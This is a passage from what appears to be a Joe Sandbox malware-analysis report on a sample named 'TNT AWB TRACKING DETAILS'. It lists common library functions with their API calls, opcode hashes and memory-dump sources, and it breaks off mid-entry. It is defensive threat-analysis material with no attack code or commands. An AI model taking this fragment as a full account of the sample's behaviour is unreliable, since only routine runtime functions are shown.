                                                    • API String ID: 823142352-0
                                                    • Opcode ID: 7295c55d251dd3136984d93f9e701cd6df6758748172b6187374fa34b2eaa442
                                                    • Instruction ID: f13faebf6281640b69ff0aa631dd2f871f6fb5f15264bb6014aa18753f6e8b0f
                                                    • Opcode Fuzzy Hash: 7295c55d251dd3136984d93f9e701cd6df6758748172b6187374fa34b2eaa442
                                                    • Instruction Fuzzy Hash: 29018471144708BEF3200E24CD8AFB67ADCAB0176CF108319FBD5BA1E0C6B62C998B50
                                                    Function 00EE0DB6 Relevance: 3.0, APIs: 2, Instructions: 44COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00EE571C: __FF_MSGBANNER.LIBCMT ref: 00EE5733
                                                      • Part of subcall function 00EE571C: __NMSG_WRITE.LIBCMT ref: 00EE573A
                                                      • Part of subcall function 00EE571C: RtlAllocateHeap.NTDLL(01840000,00000000,00000001,00000000,?,?,?,00EE0DD3,?), ref: 00EE575F
                                                    • std::exception::exception.LIBCMT ref: 00EE0DEC
                                                    • __CxxThrowException@8.LIBCMT ref: 00EE0E01
                                                      • Part of subcall function 00EE859B: RaiseException.KERNEL32(?,?,?,00F79E78,00000000,?,?,?,?,00EE0E06,?,00F79E78,?,00000001), ref: 00EE85F0
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                    • String ID:
                                                    • API String ID: 3902256705-0
                                                    • Opcode ID: a42d942579c4c83785ba1484abe9c8ad911b5cf1a34f54fc81ba095aca4b582c
                                                    • Instruction ID: 073380a62565e16b683cab6111d28fc5008c6a0ece6b4238fae8b0c20e86bf51
                                                    • Opcode Fuzzy Hash: a42d942579c4c83785ba1484abe9c8ad911b5cf1a34f54fc81ba095aca4b582c
                                                    • Instruction Fuzzy Hash: 93F0F43140025E66CB10AAAAED019DE77ECDF02315F101526FD18B6292EFB09A84D2D1
                                                    Function 00EE55FD Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: __lock_file_memset
                                                    • String ID:
                                                    • API String ID: 26237723-0
                                                    • Opcode ID: a998616a390b89b9294c79a382db6cdd2798034d4fda46ff1dcc8038cac818e8
                                                    • Instruction ID: 1bb1d0e643c95ebd24d5e70cfa98f5d94d9a0bb98f6ce0416ff080b208f763e5
                                                    • Opcode Fuzzy Hash: a998616a390b89b9294c79a382db6cdd2798034d4fda46ff1dcc8038cac818e8
                                                    • Instruction Fuzzy Hash: 2F01FC72C00A8DEBCF11AFA79D024AE7BB1BF90365F505115F41836191DB318911DF91
                                                    Function 00EE53A6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00EE8B28: __getptd_noexit.LIBCMT ref: 00EE8B28
                                                    • __lock_file.LIBCMT ref: 00EE53EB
                                                      • Part of subcall function 00EE6C11: __lock.LIBCMT ref: 00EE6C34
                                                    • __fclose_nolock.LIBCMT ref: 00EE53F6
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                    • String ID:
                                                    • API String ID: 2800547568-0
                                                    • Opcode ID: 0c2eae45e4cdff1eb6aabeefc55b96fe088a68641af6d02a1af412d3b41cc0d7
                                                    • Instruction ID: aee216362dbaaa344a36d911fa6cefe71d17b7690b9ab478ffc6f5b76bbec841
                                                    • Opcode Fuzzy Hash: 0c2eae45e4cdff1eb6aabeefc55b96fe088a68641af6d02a1af412d3b41cc0d7
                                                    • Instruction Fuzzy Hash: 51F09632800A8C9AD7116B679D057AD77E06F41379F31A105A428BB1C5CFBC89415B52
                                                    Function 00ECF290 Relevance: 1.7, APIs: 1, Instructions: 185COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0f6b926d8455ad84664bb50da3259244d7b08f48a2d7e592dcffb69362cb2d7a
                                                    • Instruction ID: 28028c5cf86a3308ee586476bf17693fa27a3dc3d1c18768cd516298bc239b53
                                                    • Opcode Fuzzy Hash: 0f6b926d8455ad84664bb50da3259244d7b08f48a2d7e592dcffb69362cb2d7a
                                                    • Instruction Fuzzy Hash: A361AAB060024A9FCB14DF64CA81FAAB7E6EF04314F14943DE916A7291D772ED52DB50
                                                    Function 00ED1FC3 Relevance: 1.7, APIs: 1, Instructions: 171COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 298d28e502fd5856b327e2982d06538ed5f85cf6a0dee36b4e76e586898b71e3
                                                    • Instruction ID: ca2467d7d407cf2c82589cd8783995200aa82d4e7053cf7e5fb54422d00bc871
                                                    • Opcode Fuzzy Hash: 298d28e502fd5856b327e2982d06538ed5f85cf6a0dee36b4e76e586898b71e3
                                                    • Instruction Fuzzy Hash: 59518E31A00604AFCF14EB64CA91FAE77E6AF45320F18506DF906BB392DA31ED42DB51
                                                    Function 00EC5AEE Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000000,?,?,00000000), ref: 00EC5B96
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: FilePointer
                                                    • String ID:
                                                    • API String ID: 973152223-0
                                                    • Opcode ID: 207440f4ce927ecdb7d7432da2703993aa71d847735320980859a05e5449cfd0
                                                    • Instruction ID: e8845ea264a24e5c718ad478d7241479bc7cce7786e801209dd9b76ff9df0586
                                                    • Opcode Fuzzy Hash: 207440f4ce927ecdb7d7432da2703993aa71d847735320980859a05e5449cfd0
                                                    • Instruction Fuzzy Hash: 6D313B32A00A09ABCB18DF6CC980AADFBB5FF44314F15962DE819A3710D771BD918B90
                                                    Function 00EFFCAC Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: ClearVariant
                                                    • String ID:
                                                    • API String ID: 1473721057-0
                                                    • Opcode ID: 69a7b4694cdd8fe099b42b27d526640b1132b759057e945945a9642f7258a3ea
                                                    • Instruction ID: 2e37ac7b7688d2ec6a64a688c601c013dbd32a4221216c99a6022ed2dd1ebb03
                                                    • Opcode Fuzzy Hash: 69a7b4694cdd8fe099b42b27d526640b1132b759057e945945a9642f7258a3ea
                                                    • Instruction Fuzzy Hash: 854107746043458FDB24DF14C544F1ABBE1BF45318F0998ACE99AAB362C772E846CF52
                                                    Function 00EC59B9 Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: _memmove
                                                    • String ID:
                                                    • API String ID: 4104443479-0
                                                    • Opcode ID: ed8425e81b8e2933628b670d04a9780b6983ad497d99c4b86aa58c3dcf12a301
                                                    • Instruction ID: cc75432b6d9d86788a4a295f62d9bb5c87884174682fd7c2ab19999bc78d8cb6
                                                    • Opcode Fuzzy Hash: ed8425e81b8e2933628b670d04a9780b6983ad497d99c4b86aa58c3dcf12a301
                                                    • Instruction Fuzzy Hash: 3F21F672508A0DEBCB049F52EC407BABFB9FB40310F21946EE589F5110E7B194D0D752
                                                    Function 00ECC5A7 Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: _wcscmp
                                                    • String ID:
                                                    • API String ID: 856254489-0
                                                    • Opcode ID: c82a141ea1bfd61ced8e18634b15314322508ca0a96555e00abc6fc7d6f0a291
                                                    • Instruction ID: 06cb1d66bc8eb6eb896183de8b4463a46fec298e0e84bdaaf890164a4b7c9526
                                                    • Opcode Fuzzy Hash: c82a141ea1bfd61ced8e18634b15314322508ca0a96555e00abc6fc7d6f0a291
                                                    • Instruction Fuzzy Hash: A611D232900118DBCB14EB65CD81EEEB7B8FF94360F10512AF825B7190DA32AD06DB90
                                                    Function 00EC3F74 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: _memmove
                                                    • String ID:
                                                    • API String ID: 4104443479-0
                                                    • Opcode ID: 081949ea55d7569ae84eb4ded2bac05a566de443f24717718b1f2ea4f17d46d7
                                                    • Instruction ID: 3fa3f4045b231dadf8fdd35e401ecb687255fb2cbfc8d590b4b63532d48b3a7e
                                                    • Opcode Fuzzy Hash: 081949ea55d7569ae84eb4ded2bac05a566de443f24717718b1f2ea4f17d46d7
                                                    • Instruction Fuzzy Hash: 521189716007429FD728DF25C551EA2B7F5EB89320B14D82EE54A9B7A1EA32E881CB40
                                                    Function 00EC4DDD Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00EC4BB5: FreeLibrary.KERNEL32(00000000,?), ref: 00EC4BEF
                                                      • Part of subcall function 00EE525B: __wfsopen.LIBCMT ref: 00EE5266
                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00F852F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00EC4E0F
                                                      • Part of subcall function 00EC4B6A: FreeLibrary.KERNEL32(00000000), ref: 00EC4BA4
                                                      • Part of subcall function 00EC4C70: _memmove.LIBCMT ref: 00EC4CBA
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Library$Free$Load__wfsopen_memmove
                                                    • String ID:
                                                    • API String ID: 1396898556-0
                                                    • Opcode ID: 1d5bd7966aae94e14e6cdab2ba097680571659a90c7570e76237e9a732a43a0a
                                                    • Instruction ID: 2dd0e937c518e8d15c3235a8fa4ac97ee66e0445099fe85bd09a244c2bd984f1
                                                    • Opcode Fuzzy Hash: 1d5bd7966aae94e14e6cdab2ba097680571659a90c7570e76237e9a732a43a0a
                                                    • Instruction Fuzzy Hash: B111E771600209ABCF15AFB0CD26FAD77E9AF44750F10942DFD41BB1C1DA729E069751
                                                    Function 00EFFD85 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: ClearVariant
                                                    • String ID:
                                                    • API String ID: 1473721057-0
                                                    • Opcode ID: 209616d0cd1a708acd0447a72b4e1feb5ea75cb116fc03a632fc22a92eca93c8
                                                    • Instruction ID: e010cae2a6ae87a2d278443230db0e9e2f476930069ebfb9a792e7bf73432642
                                                    • Opcode Fuzzy Hash: 209616d0cd1a708acd0447a72b4e1feb5ea75cb116fc03a632fc22a92eca93c8
                                                    • Instruction Fuzzy Hash: C621F2746083459FCB14DF24C544F1ABBE1BF84318F09996CE98A67762D732E806DB92
                                                    Function 00EC774D Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: _memmove
                                                    • String ID:
                                                    • API String ID: 4104443479-0
                                                    • Opcode ID: 730e1fc6960c8a9b499141b10db0b85b2c4131eb6f870ca6ded7d7284a446503
                                                    • Instruction ID: 9d2495b5930ed1cc13d26db784833e48bf93a0d4b95077d2f6c77ed99fc093ca
                                                    • Opcode Fuzzy Hash: 730e1fc6960c8a9b499141b10db0b85b2c4131eb6f870ca6ded7d7284a446503
                                                    • Instruction Fuzzy Hash: 291129322082096BD7149F2CDA81F7AB3D8EF49320B10552FFD59E7290DF32AC128B90
                                                    Function 00EC5BC0 Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ReadFile.KERNELBASE(?,?,00010000,?,00000000,00000000,?,00010000,?,00EC56A7,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00EC5C16
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: FileRead
                                                    • String ID:
                                                    • API String ID: 2738559852-0
                                                    • Opcode ID: 33358f746b4cdf9e2833a6a6943769077f96cd37514d5c44e0e08ce8d6d22878
                                                    • Instruction ID: 326b6e69ab1fbf4f17d3e71089e121861f3112f0558e87de561b22a6da9bcd64
                                                    • Opcode Fuzzy Hash: 33358f746b4cdf9e2833a6a6943769077f96cd37514d5c44e0e08ce8d6d22878
                                                    • Instruction Fuzzy Hash: 02113D36200B059FD320CF15C540FA2BBE4EF44754F10C51DE9AA96A51D772FC86CB50
                                                    Function 00EC5A7A Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: _memmove
                                                    • String ID:
                                                    • API String ID: 4104443479-0
                                                    • Opcode ID: b03e4753d7403c99c4e3704000c2eb525c496a1073e7f754d424142a3e49a39a
                                                    • Instruction ID: b1b5d26dd4def5d59d6a6bc413444a4572ee26827b1579df0c402e37e5afde0b
                                                    • Opcode Fuzzy Hash: b03e4753d7403c99c4e3704000c2eb525c496a1073e7f754d424142a3e49a39a
                                                    • Instruction Fuzzy Hash: 6401D4B5200942AFC305EB29C941D26F7E9FF853103104169E418C7702D771FC62CBE0
                                                    Function 00EE4863 Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • __lock_file.LIBCMT ref: 00EE48A6
                                                      • Part of subcall function 00EE8B28: __getptd_noexit.LIBCMT ref: 00EE8B28
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: __getptd_noexit__lock_file
                                                    • String ID:
                                                    • API String ID: 2597487223-0
                                                    • Opcode ID: b5ff1a0011c5185801c2a9f2e4c276e2f6d5aecf2ec28b262a50d0d60eb0ba67
                                                    • Instruction ID: aacd043b6c4bb4125eca04dc33b935822a4f598c5d41c7e625035e5cd51f3713
                                                    • Opcode Fuzzy Hash: b5ff1a0011c5185801c2a9f2e4c276e2f6d5aecf2ec28b262a50d0d60eb0ba67
                                                    • Instruction Fuzzy Hash: 63F0F4718006CCABDF15AFA28C053DE36E0AF00324F10A404F41CB61C1CB788950DB45
                                                    Function 00EC4E4A Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • FreeLibrary.KERNEL32(?,?,00F852F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00EC4E7E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: FreeLibrary
                                                    • String ID:
                                                    • API String ID: 3664257935-0
                                                    • Opcode ID: cadee79fe736bb5be3a7d10752c214e0c0238ca88f75ed1e191cc4637dc1cefe
                                                    • Instruction ID: f03ddb4301b23b3daed67a0fcd7da2ac4bcd9700521465ae11327f6ea043fa93
                                                    • Opcode Fuzzy Hash: cadee79fe736bb5be3a7d10752c214e0c0238ca88f75ed1e191cc4637dc1cefe
                                                    • Instruction Fuzzy Hash: 10F0A9B1100711CFCB349F24E9A0D56BBF0BF103293219A3EE1DBAA660C3329841DF00
                                                    Function 00EE0791 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00EE07B0
                                                      • Part of subcall function 00EC7BCC: _memmove.LIBCMT ref: 00EC7C06
                                                    Memory Dump Source
